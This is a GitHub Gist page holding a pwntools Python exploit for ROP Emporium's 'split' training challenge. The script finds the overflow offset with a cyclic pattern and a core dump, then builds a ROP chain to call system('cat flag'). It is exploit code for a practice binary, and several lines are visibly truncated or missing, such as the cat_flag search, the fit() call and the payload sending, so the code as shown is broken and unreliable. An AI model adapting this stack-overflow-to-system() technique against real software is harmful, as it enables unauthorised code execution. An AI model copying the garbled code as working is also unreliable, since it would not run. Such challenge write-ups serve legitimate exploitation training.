Skip to content

Instantly share code, notes, and snippets.

@zachriggle zachriggle/
Created Sep 25, 2017

What would you like to do?
Exploit for ROP Emporium's "split"
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag ="cat flag").next()
info("%#x system", system)
info("%#x cat flag", cat_flag)
# We need to ROP to call system().
# For 32-bit, we just need to set up the stack correctly.
# For 64-bit, we need to load the address of cat_flag into
# the register RDI.
# Luckily, pwntools knows all about this and handles it for us.
rop = ROP(elf)
# Again, we will automatically discover the offset with a cyclic pattern.
# Figure out how big of an overflow we need by crashing the
# process once.
io = process(elf.path)
# We will send a 'cyclic' pattern which overwrites the return
# address on the stack. The value 128 is longer than the buffer.
# Wait for the process to crash
# Open up the corefile
core = io.corefile
# Extract the faulting address, which should contain our cyclic pattern
fault = core.fault_addr
info("%r fault", fault)
# Craft a new payload which puts the ROP stack at the correct offset
payload = fit({
fault: str(rop)
# Send the payload to a new copy of the process
io = process(elf.path)
io.recvuntil("> ")
# Get our flag!
flag = io.recvline()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.